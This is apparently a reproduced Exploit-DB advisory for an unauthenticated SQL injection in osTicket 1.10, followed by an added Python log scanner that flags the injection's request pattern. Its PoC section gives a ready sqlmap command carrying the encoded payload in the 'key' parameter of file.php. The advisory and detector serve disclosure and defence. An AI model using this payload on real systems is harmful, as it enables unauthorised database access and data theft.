osTicket 1.10 – SQL Injection (PoC)

  • Author: Mehmet Ince
    Date: 2017-09-12
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/42660/
  • 1. ADVISORY INFORMATION
    ========================================
    Title: osTicket v1.10 Unauthenticated SQL Injection
    Application: osTicket
    Bugs: SQL Injection
    Class: Sensitive Information disclosure
    Remotely Exploitable: Yes
    Authentication Required: NO
    Versions Affected: <= v1.10
    Technology: PHP
    Vendor URL: http://osticket.com/
    CVSSv3 Score: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
    Date found: 12 Sep 2017
    Author: Mehmet Ince
    Advisory:
    Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396)
    
    2. CREDIT
    ========================================
    This vulnerability was identified during a penetration test
    by Mehmet INCE from PRODAFT / INVICTUS.
    
    3. VERSIONS AFFECTED
    ========================================
    osTicket < 1.10
    
    5. Technical Details & POC
    ========================================
    Please visit the advisory URL for technical details.
    
    PoC code:
    python sqlmap.py -u "http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL
    
    6. RISK
    ========================================
    The vulnerability allows remote attackers to execute a SQL query on
    the database system.
    
    7. REFERENCES
    ========================================
    Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396)
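
The PoC request in section 5 carries an encoded backtick (%60), equals sign (%3D) and hash (%23) inside the array subscript of the `key` parameter. The following log check for that request shape is an added example, not part of the original advisory or of osTicket; the function names, the access-log format and the rule that a benign subscript contains only identifier characters are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
# Assumption: a benign array subscript holds only identifier characters.
SAFE_SUBSCRIPT = re.compile(r"[A-Za-z0-9_-]*")

def suspicious_subscripts(target, path_suffix="/file.php"):
    """Return decoded parameter names whose [subscript] has other characters."""
    path, _, query = target.partition("?")
    if not path.endswith(path_suffix):
        return []
    hits = []
    for pair in query.split("&"):
        # Split on the first literal '=' before decoding, so an encoded
        # %3D inside the parameter name stays part of the name.
        name = unquote_plus(pair.partition("=")[0])
        _, bracket, rest = name.partition("[")
        if not bracket:
            continue  # scalar parameter, nothing to inspect
        parts = rest.rstrip("]").split("][")  # handles a[b][c] as well
        if any(not SAFE_SUBSCRIPT.fullmatch(p) for p in parts):
            hits.append(name)
    return hits

def scan(lines):
    """Return (line_number, names) for each log line with a flagged subscript."""
    found = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        names = suspicious_subscripts(match.group(1)) if match else []
        if names:
            found.append((number, names))
    return found

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Sep/2017:10:00:01 +0000] "GET /file.php?key=abc123&signature=9f&expires=1510472531 HTTP/1.1" 200 512',
    '192.0.2.77 - - [12/Sep/2017:10:00:05 +0000] "GET /file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311 HTTP/1.1" 200 0',
    '192.0.2.77 - - [12/Sep/2017:10:00:06 +0000] "GET /file.php?key%5Bid%60%3D1%23%5D=1&signature=1 HTTP/1.1" 200 0',
    '192.0.2.10 - - [12/Sep/2017:10:00:09 +0000] "GET /index.php?tags[0]=a HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious parameter name(s) {names}")
```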
    